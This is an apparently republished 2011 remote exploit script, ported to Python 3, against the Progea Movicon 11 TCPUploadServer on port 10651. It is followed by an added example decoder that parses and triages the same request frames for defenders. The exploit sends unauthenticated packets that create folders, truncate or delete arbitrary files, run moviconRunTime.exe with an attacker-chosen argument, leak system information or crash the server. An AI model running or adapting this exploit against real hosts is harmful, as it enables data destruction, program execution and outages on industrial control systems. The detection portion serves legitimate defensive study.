Progea Movicon 11 TCPUploadServer Remote Exploit
Source: jbrown at patchtuesday dot org   Author: Brown   Published: 2011-03-24

#!/usr/bin/env python3
# movi.py
# Progea Movicon TCPUploadServer Remote Exploit
# Jeremy Brown / jbrown at patchtuesday dot org
# Mar 2011
#
# TCPUploadServer allows remote users to execute functions on the server
# without any form of authentication. Impacts include deletion of arbitrary
# files, execution of a program with an arbitrary argument, crashing the
# server, information disclosure, and more. This design flaw puts the host
# running this server at risk of unauthorized functions being executed on
# the system.
#
# Tested on Progea Movicon 11 TCPUploadServer running on Windows
#
# Fix: http://support.progea.com/download/Mov11.2_Setup.zip
#
# Request layout as used below (observed by the author, not vendor-documented):
#   b"MovX" + function byte + sub-opcode byte(s) + NUL-padded argument,
#   72 bytes in total for functions 1-5; functions 6, 7 and the crash case
#   are 6-byte requests with no argument.
#
# Ported to Python 3: the wire format is unchanged, strings are sent as bytes.

import sys
import socket

hdr = b"MovX"

# "B" is listed as 8 only for convenience. Other functions include (the real)
# 8, 9, A, and V.
funcs = (1, 2, 3, 4, 5, 6, 7, 8)

if len(sys.argv) < 3:
    print("Progea Movicon TCPUploadServer Remote Exploit")
    print("Usage: %s <target> <function> [data]" % sys.argv[0])
    print("\nWhat would you like to do?\n")
    print("[1] Create a folder")
    print("[2] Overwrite a file with NULL and cause 100% CPU")
    print("[3] Delete a file")
    print("[4] Execute moviconRunTime.exe with a specified argument")
    print("[5] Create a desktop shortcut")
    print("[6] Retrieve drive information")
    print("[7] Retrieve os service pack")
    print("[8] Crash the server\n")
    print("* Default data is \"test\"")
    sys.exit(0)

target = sys.argv[1]
port = 10651
cs = (target, port)

func = int(sys.argv[2])

# The argument goes on the wire as raw bytes; argv is str on Python 3.
if len(sys.argv) == 4:
    data = sys.argv[3].encode("latin-1")
else:
    data = b"test"
text = data.decode("latin-1")   # for the status messages only

if func not in funcs:
    print("Invalid function")
    sys.exit(1)

# No length check, as in the original: data longer than 66 bytes simply
# produces an oversized frame instead of a padded one.
if func == 1:
    print("Crafting a packet to create the folder \"%s\"..." % text)
    pkt = hdr + b"1" + b"B" + data + b"\x00" * (66 - len(data))

elif func == 2:
    print("Crafting a packet to truncate (or create) the file \"%s\" to 0 bytes and cause 100%% CPU..." % text)
    pkt = hdr + b"2" + b"B" + data + b"\x00" * (66 - len(data))
    # O_RDWR|O_CREAT|O_TRUNC, might be more to this, it's supposedly a copy
    # function, but i'm moving on

elif func == 3:
    print("Crafting a packet to delete the file \"%s\"..." % text)
    pkt = hdr + b"3" + b"B" + data + b"\x00" * (66 - len(data))

elif func == 4:
    print("Crafting a packet to execute moviconRunTime.exe with the argument \"%s\"..." % text)
    # Two sub-opcode bytes here, so one byte less of padding keeps the frame at 72.
    pkt = hdr + b"4" + b"BB" + data + b"\x00" * (65 - len(data))

elif func == 5:
    print("Crafting a packet to create a desktop shortcut with the name (also appended to the link path) \"%s\"..." % text)
    pkt = hdr + b"5" + b"B" + data + b"\x00" * (66 - len(data))

elif func == 6:
    print("Crafting a packet to retrieve drive information...")
    pkt = hdr + b"6" + b"\x01"

elif func == 7:
    print("Crafting a packet to retrieve os service pack...")
    pkt = hdr + b"7" + b"\x00"

elif func == 8:
    print("Crafting a packet to crash the server...")
    pkt = hdr + b"B" + b"\x00"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(cs)

# The original sends the request twice on the same connection; keep that.
sock.sendall(pkt)
sock.sendall(pkt)

print("\nPacket sent!")

if func == 6 or func == 7:
    info = sock.recv(128)

    if info:
        print("\nRetrieved info:\n")
        # Skip the response header; the offsets are the ones the author observed.
        if func == 6:
            print(info[6:].decode("latin-1", "replace"))
        elif func == 7:
            print(info[22:].decode("latin-1", "replace"))
    else:
        print("\nNo info")

sock.close()
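The exploit above is only useful to a defender once the request framing it relies on is written down somewhere other than in packet-building code. The following decoder is an added example, not part of Jeremy Brown's script and not Progea's code: it splits a captured client-to-server stream on TCP/10651 into MovX requests, decodes the function, sub-opcode and NUL-padded argument, and emits one triage line per request. The layout (4-byte magic, function byte, sub-opcode, 72-byte frame for functions 1-5, 6-byte frames for the info queries and the crash case) is inferred from how the exploit builds its packets, and the field names and severities are this example's own assumptions, not vendor documentation. The sample stream at the bottom is constructed, not a real capture.

```python
#!/usr/bin/env python3
# movx_decode.py -- decode and triage Movicon TCPUploadServer requests (TCP/10651)
#
# Added example, not from the original exploit or from Progea. Frame layout is
# inferred from the exploit's packet construction (an assumption, not vendor docs):
#   offset 0..3  magic       b"MovX"
#   offset 4     function    ASCII '1'..'7'; the exploit's crash case sends 'B'
#   offset 5..   sub-opcode  b"B" for file/exec functions (function 4: b"BB"),
#                            \x01 / \x00 for the two info queries
#   then         argument    NUL-padded string, frame padded to 72 bytes

MAGIC = b"MovX"
FRAME_LEN = 72
PORT = 10651

# function byte -> (label, severity); the severities are this example's own triage
FUNCTIONS = {
    b"1": ("create_folder", "high"),
    b"2": ("truncate_file", "high"),
    b"3": ("delete_file", "critical"),
    b"4": ("exec_runtime_with_arg", "critical"),
    b"5": ("create_desktop_shortcut", "medium"),
    b"6": ("drive_info", "low"),
    b"7": ("os_service_pack", "low"),
    b"B": ("malformed_crash", "high"),
}
ARG_FUNCS = {b"1", b"2", b"3", b"4", b"5"}   # carry a padded argument, 72-byte frame


def build_frame(func: bytes, sub: bytes, arg: bytes) -> bytes:
    """Build one request the way the exploit does (used only for sample traffic)."""
    body = MAGIC + func + sub + arg
    return body + b"\x00" * (FRAME_LEN - len(body))


def parse_request(payload: bytes):
    """Decode one MovX request; return None if the payload is not MovX."""
    if len(payload) < 6 or not payload.startswith(MAGIC):
        return None
    func = payload[4:5]
    name, severity = FUNCTIONS.get(func, ("unknown", "medium"))
    body = payload[5:]
    if func == b"4":
        sub, arg = body[:2], body[2:]      # two sub-opcode bytes, 65-byte argument
    elif func in ARG_FUNCS:
        sub, arg = body[:1], body[1:]      # one sub-opcode byte, 66-byte argument
    else:
        sub, arg = body[:1], b""           # info queries / crash: no argument
    return {
        "function": func.decode("ascii", "replace"),
        "name": name,
        "severity": severity,
        "sub": sub,
        "argument": arg.rstrip(b"\x00").decode("latin-1"),
        # functions 1-5 are exactly 72 bytes; anything else is truncated or oversized
        "length_ok": len(payload) == FRAME_LEN if func in ARG_FUNCS else True,
    }


def split_frames(stream: bytes):
    """Split a captured client->server stream into requests. The exploit sends each
    frame twice on one connection, so captures hold back-to-back frames. Unknown
    function codes consume the rest of the stream (their size is not known); a
    short trailing frame is kept so parse_request can flag it via length_ok."""
    frames, i = [], 0
    while i + 6 <= len(stream) and stream.startswith(MAGIC, i):
        func = stream[i + 4:i + 5]
        if func in ARG_FUNCS:
            n = FRAME_LEN
        elif func in FUNCTIONS:
            n = 6
        else:
            n = len(stream) - i
        frames.append(stream[i:i + n])
        i += n
    return frames


def triage(stream: bytes, src: str = "unknown"):
    """One alert line per decoded request, ready for a SIEM; [] if not MovX."""
    alerts = []
    for frame in split_frames(stream):
        req = parse_request(frame)
        if req is None:
            continue
        alerts.append(
            f"[{req['severity'].upper()}] movicon_tcpuploadserver port={PORT} "
            f"unauthenticated {req['name']} src={src} "
            f"arg={req['argument']!r} len_ok={req['length_ok']}"
        )
    return alerts


# Constructed sample (not a real capture): the exploit's function 4, sent twice
# as the script does, followed by a service-pack query on the same connection.
SAMPLE_STREAM = build_frame(b"4", b"BB", b"test") * 2 + MAGIC + b"7" + b"\x00"

if __name__ == "__main__":
    for line in triage(SAMPLE_STREAM, "10.0.0.5"):
        print(line)
```

Because the exploit sends each request twice, a detector that only looks at the first 72 bytes of a connection still fires, but anything counting requests per connection should expect pairs. The `length_ok` flag is the cheap check for the oversized frames the exploit produces when `data` exceeds 66 bytes, and for truncated captures.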
